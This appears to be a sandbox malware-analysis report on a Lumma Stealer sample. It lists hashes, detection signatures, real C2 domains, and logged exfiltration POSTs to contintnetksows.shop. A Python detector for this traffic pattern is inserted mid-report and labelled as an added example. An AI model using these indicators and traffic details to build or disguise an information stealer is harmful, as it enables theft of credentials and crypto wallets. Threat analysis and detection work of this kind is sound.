Windows Analysis Report
6RVmzn1DzL.exe

Overview

General Information

Sample name: 6RVmzn1DzL.exe (renamed because the original name is a hash value)
Original sample name: 4d73427dc0b9f3dc4b846ace0ddc2deb.exe
Analysis ID: 1465909
MD5: 4d73427dc0b9f3dc4b846ace0ddc2deb
SHA1: 43b8ffa09826c21676d759c0f3dc2088c4df4efe
SHA256: 0d7b87b394b0620f352a3dd9391b202ff85c2659a007b74caf11799fc51e1e09
Tags: 32exe

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6RVmzn1DzL.exe (PID: 3276 cmdline: "C:\Users\user\Desktop\6RVmzn1DzL.exe" MD5: 4D73427DC0B9F3DC4B846ACE0DDC2DEB)
    • WerFault.exe (PID: 6608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop"], "Build id": "S1ZrlH--"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2173115481.000000000129B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2172101207.000000000129B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2172144861.000000000129B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
              No Sigma rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
07/02/24-08:32:58.581071 | 2054181 | 49712 | 443 | TCP | A Network Trojan was detected
07/02/24-08:32:52.825231 | 2054181 | 49708 | 443 | TCP | A Network Trojan was detected
07/02/24-08:33:01.124383 | 2054181 | 49719 | 443 | TCP | A Network Trojan was detected
07/02/24-08:33:03.978479 | 2054181 | 49724 | 443 | TCP | A Network Trojan was detected
07/02/24-08:32:51.867332 | 2054180 | 62670 | 53 | UDP | A Network Trojan was detected
07/02/24-08:32:55.875122 | 2054181 | 49710 | 443 | TCP | A Network Trojan was detected
07/02/24-08:32:54.529233 | 2054181 | 49709 | 443 | TCP | A Network Trojan was detected
07/02/24-08:32:51.904360 | 2054181 | 49707 | 443 | TCP | A Network Trojan was detected
07/02/24-08:32:56.961593 | 2054181 | 49711 | 443 | TCP | A Network Trojan was detected
07/02/24-08:32:59.582392 | 2054181 | 49714 | 443 | TCP | A Network Trojan was detected

              AV Detection

Source: 6RVmzn1DzL.exe.3276.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop", "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz", "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop", "foodypannyjsud.shop", "potterryisiw.shop"], "Build id": "S1ZrlH--"}
Source: 6RVmzn1DzL.exe | ReversingLabs: Detection: 18%
Source: 6RVmzn1DzL.exe | Virustotal: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 86.7% probability
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: pedestriankodwu.xyz
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: towerxxuytwi.xyz
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: ellaboratepwsz.xyz
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: penetratedpoopp.xyz
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: swellfrrgwwos.xyz
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: contintnetksows.shop
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: foodypannyjsud.shop
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: potterryisiw.shop
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: contintnetksows.shop
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp | String decryptor: S1ZrlH--
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_031E6FD2 CryptUnprotectData,0_2_031E6FD2
Source: 6RVmzn1DzL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.141.234:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: 6RVmzn1DzL.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: folder2iso.pdb source: 6RVmzn1DzL.exe
Source: C:\Users\user\Desktop\6RVmzn1DzL.exe | Code function: 0_2_006410FF FindFirstFileW,0_2_006410FF

              Networking

Source: Traffic | Snort IDS: 2054180 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (contintnetksows .shop) 192.168.2.5:62670 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49707 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49708 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49709 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49710 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49711 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49712 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49714 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49719 -> 172.67.141.234:443
Source: Traffic | Snort IDS: 2054181 ET TROJAN Observed Lumma Stealer Related Domain (contintnetksows .shop in TLS SNI) 192.168.2.5:49724 -> 172.67.141.234:443
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 42 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12830 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15072 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20562 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7081 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1261 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 586400 | Host: contintnetksows.shop
              Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: contintnetksows.shop
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: contintnetksows.shop
              Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: contintnetksows.shop
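              The traffic above follows a recognisable shape: two small application/x-www-form-urlencoded POSTs to /api (8 and 42 bytes), a run of multipart/form-data uploads of growing size to the same endpoint, then a final 77-byte form POST, all with an identical hard-coded Chrome/119 User-Agent and to one of the domains in the extracted configuration. The following detector is an added example, not part of this Joe Sandbox report or of the sample; it parses raw HTTP/1.1 request heads (the format is an assumption about your capture source), and its 128-byte beacon threshold and finding names are choices of this example. The sample input is constructed from the request lines listed above, with a benign GET added to show what is not flagged.

```python
"""Added example: flag LummaC-style C2 traffic in captured HTTP request heads.

Not part of the Joe Sandbox report or of the sample. Indicators are copied
from the report; the 128-byte beacon threshold and the input format (raw
HTTP/1.1 request heads) are assumptions of this example.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable

# C2 hostnames from the report's "Malware configuration extractor" lines.
LUMMA_C2_DOMAINS = frozenset({
    "pedestriankodwu.xyz", "towerxxuytwi.xyz", "ellaboratepwsz.xyz",
    "penetratedpoopp.xyz", "swellfrrgwwos.xyz", "contintnetksows.shop",
    "foodypannyjsud.shop", "potterryisiw.shop",
})
# Exact User-Agent and endpoint seen in the report's POST requests.
LUMMA_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
C2_PATH = "/api"
BEACON_MAX_BYTES = 128  # assumption; the observed beacons were 8, 42 and 77 bytes


@dataclass(frozen=True)
class HttpRequest:
    method: str
    path: str
    host: str
    content_type: str
    content_length: int
    user_agent: str


def parse_request_head(raw: str) -> HttpRequest:
    """Parse an HTTP/1.1 request head (request line plus headers, CRLF or LF)."""
    lines = [ln for ln in raw.replace("\r\n", "\n").split("\n") if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(
        method=method.upper(),
        path=path,
        host=headers.get("host", "").lower(),
        content_type=headers.get("content-type", "").lower(),
        content_length=int(headers.get("content-length", "0") or 0),
        user_agent=headers.get("user-agent", ""),
    )


def is_form_beacon(r: HttpRequest) -> bool:
    """Small form-urlencoded POST to /api: the check-in seen first in the report."""
    return (r.method == "POST" and r.path == C2_PATH
            and r.content_type.startswith("application/x-www-form-urlencoded")
            and r.content_length <= BEACON_MAX_BYTES)


def is_multipart_upload(r: HttpRequest) -> bool:
    """multipart/form-data POST to /api: the exfiltration uploads that follow."""
    return (r.method == "POST" and r.path == C2_PATH
            and r.content_type.startswith("multipart/form-data"))


def classify(requests: Iterable[HttpRequest]) -> dict[str, list[str]]:
    """Return finding tags per host in first-seen order; hosts with no findings are omitted."""
    findings: dict[str, list[str]] = {}
    beaconed: set[str] = set()  # hosts that already received a form beacon

    def tag(host: str, name: str) -> None:
        tags = findings.setdefault(host, [])
        if name not in tags:
            tags.append(name)

    for r in requests:
        if r.host in LUMMA_C2_DOMAINS:
            tag(r.host, "known_lumma_c2_domain")
        if is_form_beacon(r):
            beaconed.add(r.host)
            tag(r.host, "short_form_post_beacon")
            if r.user_agent == LUMMA_UA:
                tag(r.host, "hardcoded_chrome119_ua")
        elif is_multipart_upload(r) and r.host in beaconed:
            # an upload on its own is common; an upload after a beacon is the pattern
            tag(r.host, "beacon_then_multipart_upload")
    return findings


def sample_requests() -> list[HttpRequest]:
    """Constructed input: the request sequence from the report's traffic section,
    plus one benign GET that must not be flagged."""
    sequence = [
        ("application/x-www-form-urlencoded", 8),
        ("application/x-www-form-urlencoded", 42),
        ("multipart/form-data; boundary=be85de5ipdocierre1", 12830),
        ("multipart/form-data; boundary=be85de5ipdocierre1", 15072),
        ("multipart/form-data; boundary=be85de5ipdocierre1", 20562),
        ("multipart/form-data; boundary=be85de5ipdocierre1", 7081),
        ("multipart/form-data; boundary=be85de5ipdocierre1", 1261),
        ("multipart/form-data; boundary=be85de5ipdocierre1", 586400),
        ("application/x-www-form-urlencoded", 77),
    ]
    heads = [
        "POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
        f"Content-Type: {ctype}\r\nUser-Agent: {LUMMA_UA}\r\n"
        f"Content-Length: {length}\r\nHost: contintnetksows.shop\r\n\r\n"
        for ctype, length in sequence
    ]
    heads.append("GET /search?q=test HTTP/1.1\r\nHost: www.ecosia.org\r\n"
                 f"User-Agent: {LUMMA_UA}\r\n\r\n")
    return [parse_request_head(h) for h in heads]


if __name__ == "__main__":
    for host, tags in classify(sample_requests()).items():
        print(host, ", ".join(tags))
```

              The domain list and the exact User-Agent are atomic indicators that will rot as soon as the operator rotates infrastructure; the beacon-then-multipart sequence to a single /api endpoint is the part worth keeping in a rule. Note that the report only observed a DNS query and TLS connections for contintnetksows.shop, resolving to 172.67.141.234 in CLOUDFLARENET, so blocking that IP would also block unrelated Cloudflare-fronted sites; match on the hostname (SNI or Host header) instead.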
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://ocsps.ssl.com0
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://ocsps.ssl.com0?
              Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
              Source: 6RVmzn1DzL.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2157989801.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134741548.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134571691.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2159383496.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/%%
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/a
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/a7
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000002.2398263626.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/api
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/api$
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/api%
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2185036243.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apiT
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contintnetksows.shop/apiassw
